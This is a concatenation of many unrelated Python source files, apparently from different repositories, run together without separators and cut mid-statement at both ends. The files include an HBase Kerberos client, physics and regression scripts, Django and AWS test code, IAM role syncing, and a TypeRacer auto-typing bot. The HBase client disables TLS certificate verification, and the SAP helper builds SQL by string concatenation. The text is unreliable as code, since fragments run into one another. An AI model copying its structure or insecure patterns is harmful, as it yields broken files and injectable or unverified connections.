{}'.format(num1, num2)) elif num2 > num1: print('The number {} is greater than {}'.format(num2, num1)) elif num1 == num2: print('The two numbers are equal!!') from thrift.transport import THttpClient from thrift.protocol import TBinaryProtocol from hbase.Hbase import Client from subprocess import call import ssl import kerberos def kerberos_auth(): call("kdestroy",shell="True") clientPrincipal='hbase/c2677-node4.coelab.cloa.com@CO.' 
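# The steps below obtain a Kerberos TGT for the HBase principal via kinit, then run a
# GSSAPI/SPNEGO handshake for the "HTTP" service to build the 'Negotiate' Authorization
# header that the Kerberized Thrift-over-HTTP client further down sends with its requests.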
keytab="/run/cloudera-scm-agent/process/1546335371-hbase-HBASETHRIFTSERVER/hbase.keytab" kinitCommand="kinit"+" "+"-kt"+" "+keytab+" "+clientPrincipal call(kinitCommand,shell="True") hbaseService="HTTP" __, krb_context = kerberos.authGSSClientInit(hbaseService) kerberos.authGSSClientStep(krb_context, "") negotiate_details = kerberos.authGSSClientResponse(krb_context) headers = {'Authorization': 'Negotiate ' + negotiate_details,'Content-Type':'application/binary'} return headers httpClient = THttpClient.THttpClient('https://c2677-node4.coelab.cloudera.com:9090/', cert_file='/etc/pki/tls/certs/localhost.crt',key_file='/etc/pki/tls/private/localhost.key', ssl_context=ssl._create_unverified_context()) # if no ssl verification is required httpClient.setCustomHeaders(headers=kerberos_auth()) protocol = TBinaryProtocol.TBinaryProtocol(httpClient) httpClient.open() client = Client(protocol) tables=client.getTableNames() print(tables) httpClient.close() Chen-Jialin/Undergraduate-Thesis # Estimate the size of a CdSe quantum dot from math import * c = 3e8# speed of light h = 6.63e-34# Planck constant epsilon_0 = 8.85e-12# vacuum permittivity epsilon_r = 8.0251# relative permittivity of CdSe e = 1.6e-19# elementary charge m_e = 9.11e-31# electron mass m_e_eff = 0.12 * m_e# electron effective mass m_h_eff = 0.9 * m_e# hole effective mass wavelength = 646# wavelength in nm E_gap = 1.74 * 1.6e-19# band gap of the bulk material Delta_E = h * c / (wavelength * 1e-9)# band gap of the quantum dot a = h**2 / 8 * (1 / m_e_eff + 1 / m_h_eff) b = -1.8 * e**2 / 4 / pi / epsilon_0 / epsilon_r c = E_gap - Delta_E r = 1 / ((-b + sqrt(b**2 - 4 * a * c)) / (2 * a)) print(2 * r) pcworld/ldapom # -*- coding: utf-8 -*- from paver.easy import * @task def test(options): info("Running tests for Python 2") sh('python2 -m unittest -v tests') info("Running tests for Python 3") sh('python3 -m unittest -v tests') @task def coverage(options): info("Running coverage for Python 2") sh('coverage2 run --source ldapom ./tests.py') sh('coverage2 report') info("Running coverage for Python 3") sh('coverage3 run --source ldapom ./tests.py') sh('coverage3 report') #!/usr/bin/env python # -*- coding: utf-8 -*- from setuptools import find_packages, setup from specchio import __version__ tests_requirements = [ "mock >= 1.0.1, < 2.0.0", "testfixtures >= 4.1.2, < 5.0.0" ] setup( name="Specchio", version=__version__, url="https://github.com/brickgao/specchio", license="MIT", description="Specchio is a tool that can help you to rsync your file " "automatically, it uses `.gitignore` in git to discern which" " file is ignored.", long_description=open("README.md").read(), author="", author_email="", packages=find_packages(exclude=["tests"]), zip_safe=False, install_requires=[ "colorlog >= 2.6.0, < 3.0.0", "watchdog >= 0.8.3, < 1.0.0" ] + tests_requirements, tests_require=tests_requirements, test_suite="nose.collector", entry_points={ "console_scripts": [ "specchio = specchio.main:main" ], }, classifiers=[ "Environment :: Console", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python", "Programming Language :: Python :: 2", "Topic :: Software Development :: Testing", "Topic :: Software Development :: Libraries :: Python Modules", ], ) """Database migrations for the iati_standard app.""" typeracer.py0 from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.common.keys import Keys import time from random import randint #Set minimum WPM required min_wpm = 60 #Open Chrome driver = webdriver.Chrome(executable_path="chromedriver.exe") # Enter the URL # Start Race # Press the enter key when the race has started, when the program is in the 
waiting state while(1): text = '' k = input("waiting") a = driver.find_elements_by_xpath("//span[@unselectable='on']") for i in a: text = text + i.get_attribute('innerHTML') print(text) text.replace("\\","") if text[-1] != '.' or text[-1] != '!' or text[-1] != '?': text = text + ' ' time.sleep(1) print("Typing text") for letter in text: delay = randint(1,100) try: driver.find_element_by_xpath("//input[@autocorrect='off']").send_keys(letter) except: break time.sleep((delay/100)*(60/(5*min_wpm))) import random from sklearn.model_selection import GridSearchCV from datetime import datetime class GridSearch: def __init__(self, model, params, samples, lables): self.model = model self.params = params self.samples = samples self.lables = lables def search(self): print "Grid searh begins at (%s) ..." %(str(datetime.now())) chunk_size = int(self.samples.shape[0]*0.2) test_set_index = range(self.samples.shape[0]) random.shuffle(test_set_index) search_sample_set = self.samples[test_set_index[0:chunk_size]] search_lable_set = self.lables[test_set_index[0:chunk_size]] self.grid = GridSearchCV(self.model, param_grid=self.params) self.grid.fit(search_sample_set, search_lable_set) print "Grid searh ends at (%s) ..." %(str(datetime.now())) return self.grid.best_params_############################################################################## # Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # # # Licensed under the Apache License, Version 2.0 (the "License"). # # You may not use this file except in compliance # # with the License. A copy of the License is located at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # or in the "license" file accompanying this file. This file is # # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # # KIND, express or implied. See the License for the specific language # # governing permissions and limitations under the License. 
# ############################################################################## from moto import mock_ssm from utils.logger import Logger from manifest.cfn_params_handler import CFNParamsHandler from aws.services.ssm import SSM log_level = 'info' logger = Logger(loglevel=log_level) cph = CFNParamsHandler(logger) ssm = SSM(logger) def test_update_alfred_ssm(): keyword_ssm = 'alfred_ssm_not_exist_alfred_ssm' value_ssm = 'parameter_store_value' value_ssm, param_flag = cph._update_alfred_ssm( keyword_ssm, value_ssm, False) assert param_flag is True @mock_ssm def test_update_alfred_genkeypair(): ssm.put_parameter('testkeyname', 'testvalue', 'A test parameter', 'String') param = { "ssm_parameters": [ { "name": "keymaterial", "value": "$[keymaterial]" }, { "name": "keyfingerprint", "value": "$[keyfingerprint]" }, { "name": "testkeyname", "value": "$[keyname]" } ] } account = 1234567890 region = 'us-east-1' value = cph._update_alfred_genkeypair(param, account, region) assert value == 'testvalue' @mock_ssm def test_update_alfred_genpass(): ssm.put_parameter('testkeyname', 'testvalue', 'A test parameter', 'String') param = { "ssm_parameters": [ { "name": "testkeyname", "value": "$[password]" } ] } keyword = 'alfred_genpass_10' value = '' value = cph._update_alfred_genpass(keyword, param) assert value == '_get_ssm_secure_string_testkeyname' @mock_ssm def test_update_alfred_genaz(): ssm.put_parameter('testkeyname', 'testvalue', 'A test parameter', 'String') param = { "ssm_parameters": [ { "name": "testkeyname", "value": "$[az]" } ] } keyword = 'alfred_genaz_1' account = 1234567890 region = 'us-east-1' value = '' value = cph._update_alfred_genaz(keyword, param, account, region) assert value == 'testvalue' @mock_ssm def test_random_password(): ssm.put_parameter('testkeyname', 'testvalue', 'A test parameter', 'String') length = 10 key_password = '' alphanum = False value = cph.random_password(length, key_password, alphanum) assert value == '_get_ssm_secure_string_testkeyname' from copy import copy class Shared: dictio = {} def apply(con, tab_name): query = "SELECT FIELDNAME, DOMNAME, KEYFLAG, CHECKTABLE, ROLLNAME FROM "+con.table_prefix+"DD03VV WHERE TABNAME = '"+tab_name+"' ORDER BY POSITION" df = con.execute_read_sql( query, ["FIELDNAME", "DOMNAME", "KEYFLAG", "CHECKTABLE", "ROLLNAME"]) df = df[df["DOMNAME"] != " "] try: df["FIELDNAME"] = "event_" + df["FIELDNAME"] except: pass return df def apply_static(con, tab_name): if tab_name not in Shared.dictio: Shared.dictio[tab_name] = apply(con, tab_name) return copy(Shared.dictio[tab_name]) def classify_table(con, tab_name, all_tables=None): if all_tables is None: all_tables = dict() primary_keys = {} for x in all_tables: fields2 = apply_static(con, tab_name=x).to_dict("r") pk = set() for el in fields2: if el["KEYFLAG"] == "X": pk.add(el["FIELDNAME"]) primary_keys[x] = pk fields = apply_static(con, tab_name=tab_name) stream = fields.to_dict("r") fields_dict = {x["FIELDNAME"]: x["DOMNAME"] for x in stream} for key in fields_dict: if "TCODE" in key: return "Transaction" for key in fields_dict: if "VBTYP" in key: return "Flow" for x in primary_keys: if x != tab_name: if primary_keys[tab_name].issuperset(primary_keys[x]): if not primary_keys[x].issuperset(primary_keys[tab_name]): return "Detail" return "Record" software/algorithm/tof-to-distance/tof2distance.py import os import matplotlib.pyplot as plt import numpy as np from sklearn.linear_model import LinearRegression DATA_DIR = "distance" xss = [] yss = [] for filename in os.listdir(DATA_DIR): 
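# Each file in the distance/ directory is named after the true distance it was recorded at;
# the 50 raw time-of-flight readings read below all share that filename value as their
# ground-truth y for the linear fit.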
print(filename) xs = [] ys = [] y = float(filename) f = open(DATA_DIR + "/" + filename, 'r') for i in range(0, 50): line = f.readline() print(str(i) + ": " + line) x = float(line) print(str(x) + ": " + str(y)) xs.append(x) ys.append(y) plt.plot(xs,ys, 'x') xss.append(xs) yss.append(ys) x = np.array(xss).reshape((-1, 1)) y = np.array(yss).reshape((-1)) model = LinearRegression() model.fit(x, y) x = np.arange(0, 3500, 1) y = model.predict(np.array(x).reshape((-1, 1))) plt.plot(x,y) # x = [352] # y = model.predict(np.array(x).reshape((-1, 1))) # print(y) print(model.coef_[0]) print(model.intercept_) # x = 368 # y = model.coef_[0] * x + model.intercept_ # print(str(x) + ": " + str(y)) error_sum = 0 error_count = 0 for filename in os.listdir(DATA_DIR): print(filename) xs = [] ys = [] y = float(filename) f = open(DATA_DIR + "/" + filename, 'r') for i in range(0, 50): line = f.readline() print(str(i) + ": " + line) x = float(line) est_y = model.coef_[0] * x + model.intercept_ error_sum += abs(est_y - y) error_count += 1 print("mean error:" + str(error_sum/error_count)) plt.show()# Generated by Django 2.1.2 on 2018-12-07 18:13 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('westmarchSite', '0002_auto_20181207_1725'), ] operations = [ migrations.AlterField( model_name='character', name='Bio', field=models.TextField(null=True, verbose_name='Full Bio'), ), migrations.AlterField( model_name='character', name='BioShort', field=models.CharField(max_length=120, null=True, verbose_name='Short description'), ), ] 0 # @Author ZhangGJ # @Date 2021/01/24 10:12 import urllib.parse import urllib.request data = bytes(urllib.parse.urlencode({'word': 'hello'}), encoding='utf8') response = urllib.request.urlopen('http://httpbin.org/post', data=data) print(response.read()) x = [map(int,raw_input().split()) for i in range(4)] cnt = 0 y = [0]*4 for i in range(4): cnt += x[i][1] - x[i][0] y[i] = cnt print max(y)sitedata/analog """Analog tests.""" from __future__ import (absolute_import, division, print_function, unicode_literals) # -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available. Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved. BK-BASE 蓝鲸基础平台 is licensed under the MIT License. License for BK-BASE 蓝鲸基础平台: -------------------------------------------------------------------- Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
""" import time import attr from auth.bkiam.backend import IAMBackend from auth.exceptions import BKIAMNotSupportAttrAutho, BKIAMSyncAuthoErr from auth.handlers.resource.manager import AuthResourceManager from auth.models.base_models import ActionConfig, RoleConfig, RolePolicyInfo from common.log import logger from iam import Action, Subject from iam.auth.models import ( ApiBatchAuthRequest, ApiBatchAuthResourceWithId, ApiBatchAuthResourceWithPath, ) class RoleSync: GRANT = "grant" REVOKE = "revoke" def __init__(self): self.backend = IAMBackend() self._iam = self.backend._iam self.system = self.backend.system def sync(self, user_id, role_id, object_id, operate): """ 与 IAM 同步权限,operate 可以为 grant 或者 revoke """ role = RoleConfig.objects.get(pk=role_id) if not role.to_iam: return policies = self.get_related_policies_with_role(role_id) role_resource = AuthResourceManager.init(role.object_class_id).get(object_id, raise_exception=True) instance_policies, path_polices = self.classify_policies(policies, role_id, role_resource.resource_type) instance_action_ids = [p.action_id for p in instance_policies] path_action_ids = [p.action_id for p in path_polices] args = [user_id, role_id, instance_action_ids, path_action_ids, operate] start_time = time.time() try: self.sync_one_resource_more_inst_actions(user_id, role_resource, instance_policies, operate) self.sync_one_resource_more_path_actions(user_id, role_resource, path_polices, operate) except Exception as err: logger.exception(f"[IAM RoleSync] Fail to sync, args={args}, error={err}") raise BKIAMSyncAuthoErr() finally: end_time = time.time() logger.info("[IAM RoleSync] Cost {} seconds, args={}".format(end_time - start_time, args)) logger.info(f"[IAM RoleSync] Succeed to sync, args={args}") def classify_policies(self, policies, role_id, resource_type): """ 将策略分类,主要分为实例策略和路劲策略 """ instance_policies = list() path_polices = list() for p in policies: if not p.has_instance: continue if not p.to_iam: continue if p.scope_attr_key: raise BKIAMNotSupportAttrAutho( ("Now cannot sync attr_authentication to iam, " "role_id={}, policy={}").format(role_id, p) ) if resource_type == p.object_class: instance_policies.append(p) else: path_polices.append(p) return instance_policies, path_polices def sync_one_resource_more_inst_actions(self, user_id, role_resource, policies, operate): """ 同步一个资源,多个实例动作 """ action_ids = [p.action_id for p in policies] resources = [ ApiBatchAuthResourceWithId( self.system, role_resource.resource_type, [{"id": role_resource.id, "name": role_resource.display_name}] ) ] request = self._make_batch_request_with_resources(user_id, action_ids, resources, operate) self._iam.batch_grant_or_revoke_instance_permission(request, bk_username=user_id) def sync_one_resource_more_path_actions(self, user_id, role_resource, policies, operate): """ 同步一个资源,多个路径动作 """ # 生成资源路径 path = [{"type": role_resource.resource_type, "id": role_resource.id, "name": role_resource.display_name}] # 按照 object_class 对 action 分类,仅相同资源类型的 actions 可以合并授权 actions_mapping = dict() for p in policies: actions_mapping.setdefault(p.object_class, []) actions_mapping[p.object_class].append(p.action_id) for action_resource_type, action_ids in list(actions_mapping.items()): resources = [ApiBatchAuthResourceWithPath(self.system, action_resource_type, [path])] request = self._make_batch_request_with_resources(user_id, action_ids, resources, operate) self._iam.batch_grant_or_revoke_path_permission(request, bk_username=user_id) def grant(self, user_id, role_id, object_id): """ 添加角色授权,同步 IAM """ 
self.sync(user_id, role_id, object_id, operate=self.GRANT) def revoke(self, user_id, role_id, object_id): """ 取消角色授权,同步 IAM """ self.sync(user_id, role_id, object_id, operate=self.REVOKE) def _make_batch_request_with_resources(self, user_id, action_ids, resources, operate): request = ApiBatchAuthRequest( self.system, Subject("user", user_id), [Action(action_id) for action_id in action_ids], resources, operate=operate, ) return request def get_related_policies_with_role(self, role_id, action_id=None, to_iam=True): """ 获取与角色关联的操作 @returnExample role_id=project.manager 样例 [ { 'action_id': 'flow.manage', 'object_class': 'flow', 'scope_attr_key': null, 'scope_attr_value': null }, { 'action_id': 'result_table.query_data', 'object_class': 'result_table', 'scope_attr_key': 'sensitivity', 'scope_attr_value': 'private' }, { 'action_id': 'project.manage', 'object_class': 'project', 'scope_attr_key': null, 'scope_attr_value': null } ] """ if action_id is None: raw_policies = RolePolicyInfo.objects.filter(role_id_id=role_id) else: raw_policies = RolePolicyInfo.objects.filter(role_id_id=role_id, action_id_id=action_id) cleaned_policies = list() for p in raw_policies: if p.action_id_id == "*": actions = ActionConfig.objects.filter(object_class=p.object_class_id, to_iam=to_iam) policies = [ ActionPolicy( action_id=self.backend.to_iam_action(a.action_id), has_instance=a.has_instance, to_iam=a.to_iam, object_class=p.object_class_id, scope_attr_key=p.scope_attr_key, scope_attr_value=p.scope_attr_value, ) for a in actions ] else: action = ActionConfig.objects.get(pk=p.action_id_id) if action.to_iam == to_iam: policies = [ ActionPolicy( action_id=self.backend.to_iam_action(action.action_id), has_instance=action.has_instance, to_iam=action.to_iam, object_class=p.object_class_id, scope_attr_key=p.scope_attr_key, scope_attr_value=p.scope_attr_value, ) ] else: policies = [] cleaned_policies.extend(policies) # 去重 cleaned_policies = list({p.action_id: p for p in cleaned_policies}.values()) return cleaned_policies @attr.s class ActionPolicy: action_id = attr.ib(type=str) has_instance = attr.ib(type=bool) to_iam = attr.ib(type=bool) object_class = attr.ib(type=str) scope_attr_key = attr.ib(type=str) scope_attr_value = attr.ib(type=str) 10-100 """Management command for populating ocw course data""" from django.core.management import BaseCommand from course_catalog.models import Course from course_catalog.tasks import get_ocw_data from open_discussions.constants import ISOFORMAT from open_discussions.utils import now_in_utc from search.task_helpers import delete_course class Command(BaseCommand): """Populate ocw courses""" help = "Populate ocw courses" def add_arguments(self, parser): parser.add_argument( "--overwrite", dest="force_overwrite", action="store_true", help="Overwrite any existing records", ) parser.add_argument( "--delete", dest="delete", action="store_true", help="Delete all existing records first", ) parser.add_argument( "--skip-s3", dest="upload_to_s3", action="store_false", help="skip uploading course files to s3", ) parser.add_argument( "--course-url-substring", dest="course_url_substring", required=False, help="If set, backpopulate only courses whose urls match with this substring", ) super().add_arguments(parser) def handle(self, *args, **options): """Run Populate ocw courses""" course_url_substring = options.get("course_url_substring") if options["delete"]: self.stdout.write("Deleting all existing OCW courses") for course in Course.objects.filter(platform="ocw"): course.delete() 
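# delete_course comes from search.task_helpers and is expected to also remove the
# corresponding course document from the search index, beyond the row deleted above.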
delete_course(course) else: start = now_in_utc() task = get_ocw_data.delay( force_overwrite=options["force_overwrite"], upload_to_s3=options["upload_to_s3"], course_url_substring=course_url_substring, utc_start_timestamp=start.strftime(ISOFORMAT), ) self.stdout.write( "Started task {task} to get ocw course data " "w/force_overwrite={overwrite}, upload_to_s3={s3}, course_url_substring={course_url_substring}".format( task=task, overwrite=options["force_overwrite"], s3=options["upload_to_s3"], course_url_substring=course_url_substring, ) ) self.stdout.write("Waiting on task...") task.get() total_seconds = (now_in_utc() - start).total_seconds() self.stdout.write( "Population of ocw data finished, took {} seconds".format(total_seconds) ) import io import json from src import cmd from src import database from pydub import AudioSegment from pydub import playback if __name__ == "__main__": parser = cmd.getArgumentParser() parser.add_argument('-song_id', type=int, required=True, help='Song ID containing beat') parser.add_argument('-beat_id', type=int, required=True, help='Beat ID to play') args = parser.parse_args() db = database.Database( host=args.dbhost, port=args.dbport, dbname=args.dbname, user=args.dbuser, password=args.dbpass ) songs = db.getSongs(id = args.song_id) if not songs: print("Not Found") exit(1) beats = songs[0].getBeats(id = args.beat_id) if not beats: print("Not Found") exit(1) clip = io.BytesIO(beats[0].clip.tobytes()) segment = AudioSegment.from_file(clip, format=beats[0].format) playback.play(segment) wanglabprinceton/accumulating_puffsutil/tcpip.py import socket, time import numpy as np import logging, json class TCPIP(): def __init__(self, tcpip_address, tcpip_port=6666, tcpip_terminator='\n'): if tcpip_address is None: self._valid = False return self._valid = True self.tcpip_address = tcpip_address self.tcpip_port = tcpip_port self.tcpip_terminator = tcpip_terminator # setup socket self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.settimeout(0.500) #brief when initiating try: self.socket.connect((self.tcpip_address, self.tcpip_port)) except socket.timeout: pass #logging.warning('Socket not connected.') except: logging.warning('TCPIP not connected; turn on internet to send messages.') return self.socket.settimeout(10.0) def send(self, msg): if not self._valid: return True try: # msg : a JSON-formatted string or dict to be converted to one if isinstance(msg, dict): msg = json.dumps(msg) self.socket.send(msg.encode(encoding='utf-8')) self.socket.send(self.tcpip_terminator.encode(encoding='utf-8')) except socket.timeout: logging.warning('TCPIP message did not send.') return False try: r = self.socket.recv(3) if r.decode('UTF8') != '_ok': logging.warning('TCPIP did not receive OK response; communication issue.') return False else: self._reconnect() except socket.timeout: logging.warning('Attempted TCPIP send; no reply from remote; re-establish connection.') return False return True def end(self): if self._valid: self.socket.close() def reconnect(self): if not self._valid: return True return self._reconnect() def _reconnect(self): #print ('Click reconnect on remote computer...') self.socket.close() self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.settimeout(10.0) try: self.socket.connect((self.tcpip_address, self.tcpip_port)) except socket.timeout: logging.warning('Reconnect failed; socket not connected.') return False return True #print('Reconnected.') if __name__ == '__main__': address = '172.16.58.3' t = TCPIP(address) from 
PIL import Image from SSIM_PIL import compare_ssim from PIL import Image import requests from io import BytesIO from sklearn import metrics import numpy as np #import cv2 #from SSIM_PIL import compare_ssim from PIL import Image def distance_diff_size_plot(images_sentinel,images_naip): #right location experiment MSE_global_r = [] SSIM_global_r = [] for i in range(0,20): #print(i) drone_url = images_sentinel[i] planet_url = images_naip[i] location = "TRUE" #response = requests.get(drone_url) drone_img = Image.open(drone_url) planet_img = Image.open(planet_url) planet_img = planet_img.convert('RGB') drone_img = drone_img.resize((512,512)) base_planet_img = planet_img.resize((512, 512)) x_1 = [] for i in range(1,43): num = 12*i if (num % 2) != 0: num = num+1 x_1.append(num) if i == 42: x_1.append(512) #print(x_1) if location == "TRUE": MSE_tt = [] SSIM_tt = [] for i in range(0,43): if i in range(0,42): #print(i) width = x_1[i]/2 #print(width) cropped_drone_img = drone_img.crop((256 - width, 256 - width, 256 + width, 256 + width)) #print("size",cropped_drone_img.size) cropped_drone_img = drone_img.crop((256 - width, 256 - width, 256 + width, 256 + width)).resize((512, 512)) cropped_planet_img = base_planet_img.crop((256 - width, 256 - width, 256 + width, 256 + width)).resize((512, 512)) np_drone = np.array(cropped_drone_img) np_planet = np.array(cropped_planet_img) MSE = metrics.mean_squared_error(np_drone.flatten(), np_planet.flatten()) MSE_tt.append(MSE) SSIM = compare_ssim(cropped_drone_img,cropped_planet_img) SSIM_tt.append(SSIM) else: #print(i, "after 500") if i == 43: cropped_drone_img = cropped_drone_img.resize((512, 512)) cropped_planet_img = base_planet_img.resize((512, 512)) cropped_drone_img = cropped_drone_img.resize((i*12, i*12)) cropped_planet_img = base_planet_img.resize((i*12, i*12)) #print(cropped_planet_img.size) np_drone = np.array(cropped_drone_img) np_planet = np.array(cropped_planet_img) MSE = metrics.mean_squared_error(np_drone.flatten(), np_planet.flatten()) MSE_tt.append(MSE) SSIM = compare_ssim(cropped_drone_img,cropped_planet_img) SSIM_tt.append(SSIM) #print(len(MSE_global_r)) SSIM_global_r.append(SSIM_tt) MSE_global_r.append(MSE_tt) #wrong location experiment import random location = "WRONG" MSE_global_wl = [] SSIM_global_wl = [] def rotate(l, n): return l[n:] + l[:n] for i in range(0,20): drone_url = images_sentinel[i] images_naip_rot = rotate(images_naip, 2) planet_url = images_naip_rot[i] drone_img = Image.open(drone_url) planet_img = Image.open(planet_url) planet_img = planet_img.convert('RGB') drone_img = drone_img.resize((512,512)) base_planet_img = planet_img.resize((512, 512)) x_1 = [] for i in range(1,43): num = 12*i if (num % 2) != 0: num = num+1 x_1.append(num) if i == 42: x_1.append(512) if location == "WRONG": MSE_tt = [] SSIM_tt = [] for i in range(0,43): if i in range(0,42): width = x_1[i]/2 cropped_drone_img = drone_img.crop((256 - width, 256 - width, 256 + width, 256 + width)) cropped_drone_img = drone_img.crop((256 - width, 256 - width, 256 + width, 256 + width)).resize((512, 512)) cropped_planet_img = base_planet_img.crop((256 - width, 256 - width, 256 + width, 256 + width)).resize((512, 512)) np_drone = np.array(cropped_drone_img) np_planet = np.array(cropped_planet_img) MSE = metrics.mean_squared_error(np_drone.flatten(), np_planet.flatten()) MSE_tt.append(MSE) SSIM = compare_ssim(cropped_drone_img,cropped_planet_img) SSIM_tt.append(SSIM) else: if i == 43: cropped_drone_img = cropped_drone_img.resize((512, 512)) cropped_planet_img = 
base_planet_img.resize((512, 512)) cropped_drone_img = cropped_drone_img.resize((i*12, i*12)) cropped_planet_img = base_planet_img.resize((i*12, i*12)) np_drone = np.array(cropped_drone_img) np_planet = np.array(cropped_planet_img) MSE = metrics.mean_squared_error(np_drone.flatten(), np_planet.flatten()) MSE_tt.append(MSE) SSIM = compare_ssim(cropped_drone_img,cropped_planet_img) SSIM_tt.append(SSIM) MSE_global_wl.append(MSE_tt) SSIM_global_wl.append(SSIM_tt) import pandas as pd x_2 = [i*i for i in x_1] df_r = pd.DataFrame(MSE_global_r, index =["image 1", "image 2", "image 3", "image 4", "image 5", "image 6","image 7", "image 8", "image 9","image 10","image 11", "image 12", "image 13", "image 14", "image 15", "image 16","image 17", "image 18", "image 19","image 20"], columns =x_2) tmp_df_r = df_r df_wl = pd.DataFrame(MSE_global_wl, index =["image 1", "image 2", "image 3", "image 4", "image 5", "image 6","image 7", "image 8", "image 9","image 10","image 11", "image 12", "image 13", "image 14", "image 15", "image 16","image 17", "image 18", "image 19","image 20"], columns =x_2) tmp_df_wl = df_wl A_r = [] for k in tmp_df_r.keys(): row_df = tmp_df_r[k] #row_df_wt = tmp_df_wt[k] row_df_wl = tmp_df_wl[k] for row in row_df.index: a = [row, float(row_df[row]), float(k), "rl"] #b = [row, float(row_df_wt[row]), float(k), "wt-rl"] c = [row, float(row_df_wl[row]), float(k), "wl"] A_r += [a] #A_r += [b] A_r += [c] new_pd_r = pd.DataFrame(A_r, columns=["Image", "Distance", "Area", "Experiment"]) import matplotlib.pyplot as plt import seaborn as sns plt = sns.lineplot(x="Area", y="Distance", hue="Experiment", data=new_pd_r, palette=["g","r"]) plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0)) plt.set(xlabel="Area in $m^2$", ylabel='MSE') #sns.set_style("ticks", {"xtick.major.size": 8, "ytick.major.size": 8}) #sns.ticklabel_format(self,axis='both', style='', scilimits=None, useOffset=None, useLocale=None, useMathText=None) #!/usr/bin/env python3 from threading import Timer import i3ipc import json import psutil import time import urllib.request timer = None statsIntervalSec = 5 covidInterval = 600/statsIntervalSec counter = 0 covidCases = 0 workspaceStatus = "         " #           batteryStatus = "" # full, charging, discharging batteryCharge = 1.0 # out of 1.0 centerStats = '' rightStats = '' def render(): statusText = workspaceStatus if batteryStatus != "full": secondaryColor = "ffb86c" if batteryStatus == "discharging" else "8be9fd" batteryWidth = round(batteryCharge * len(workspaceStatus)) statusText = "%{U#ffffff}%{+o}" + statusText[:batteryWidth] \ + "%{U#" + secondaryColor + "}" \ + statusText[batteryWidth:] + "%{-o}" \ + " {0:.0%}".format(batteryCharge) print(' '+statusText+'%{c}'+centerStats+'%{r}'+rightStats+' ') i3 = i3ipc.Connection() def updateWorkspaceStatus(): global workspaceStatus activeWorkspaces = [] focusedWorkspace = -1 for j in i3.get_workspaces(): activeWorkspaces.append(j.num) if j.focused: focusedWorkspace = j.num statusText = "" for i in range(1, 11): if i == focusedWorkspace: statusText += " " elif i in activeWorkspaces: statusText += " " else: statusText += " " workspaceStatus = statusText.strip() # Subscribe to events def handleWorkspaceUpdate(self, e): updateWorkspaceStatus() render() def updateStats(): global batteryStatus, batteryCharge, centerStats, rightStats, timer, counter, covidCases if counter % covidInterval == 0: try: web = urllib.request.urlopen("https://coronavirus-19-api.herokuapp.com/all") covidCases = 
json.loads(web.read().decode())["cases"] except: pass counter += 1 with open("/sys/class/power_supply/BAT0/status", 'r') as f: batteryStatus = f.readlines()[0].lower().strip() if batteryStatus != "full": with open("/sys/class/power_supply/BAT0/charge_full", 'r') as f: chargeFull = int(f.readlines()[0].strip()) with open("/sys/class/power_supply/BAT0/charge_now", 'r') as f: chargeNow = int(f.readlines()[0].strip()) batteryCharge = chargeNow / chargeFull cpu = round(sum(psutil.cpu_percent(percpu=True))/2) # two vCPUs per CPU try: temps = psutil.sensors_temperatures()['coretemp'] except: temps = [0] temp = round(max([t.current for t in temps])) ram = psutil.virtual_memory().used/1000/1000/1000 # '127% 10* ziggy 12.64 GB' centerStats = '{:3}% {:2}° {} {:2.2f} GB'.format(cpu, temp, 'ziggy', ram) rightStats = '{:,}'.format(covidCases) + ' ' + time.strftime('%Y-%m-%d %H:%M') timer = Timer(statsIntervalSec, updateStats) timer.start() render() updateWorkspaceStatus() updateStats() i3.on('workspace::focus', handleWorkspaceUpdate) try: i3.main() except KeyboardInterrupt: timer.cancel() import tensorflow as tf from Dataset import Dataset from constants import IMAGENET_TF_DATADIR slim = tf.contrib.slim class ImageNet(Dataset): SPLITS_TO_SIZES = {'train': 1281167, 'validation': 50000} ITEMS_TO_DESCRIPTIONS = { 'image': 'A color image of varying height and width.', 'height': 'Height of the image in pixels', 'width': 'Width of the image in pixels', 'edges': 'An edge map of the same size as the image.', 'cartoon': 'An cartooned version of the image.', 'label': 'The label id of the image, integer between 0 and 999', 'label_text': 'The text of the label.', } def __init__(self): Dataset.__init__(self) self.data_dir = IMAGENET_TF_DATADIR self.file_pattern = '%s-*' self.num_classes = 1000 self.label_offset = 1 self.name = 'imagenet' def get_keys_to_features(self): keys_to_features = { 'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''), 'image/format': tf.FixedLenFeature((), tf.string, default_value='jpeg'), 'image/height': tf.FixedLenFeature((), tf.int64), 'image/width': tf.FixedLenFeature((), tf.int64), 'image/class/label': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1), 'image/class/text': tf.FixedLenFeature([], dtype=tf.string, default_value=''), } return keys_to_features def get_items_to_handlers(self): items_to_handlers = { 'image': slim.tfexample_decoder.Image('image/encoded', 'image/format', channels=3), 'height': slim.tfexample_decoder.Tensor('image/height'), 'width': slim.tfexample_decoder.Tensor('image/width'), 'label': slim.tfexample_decoder.Tensor('image/class/label'), 'label_text': slim.tfexample_decoder.Tensor('image/class/text'), } return items_to_handlers def 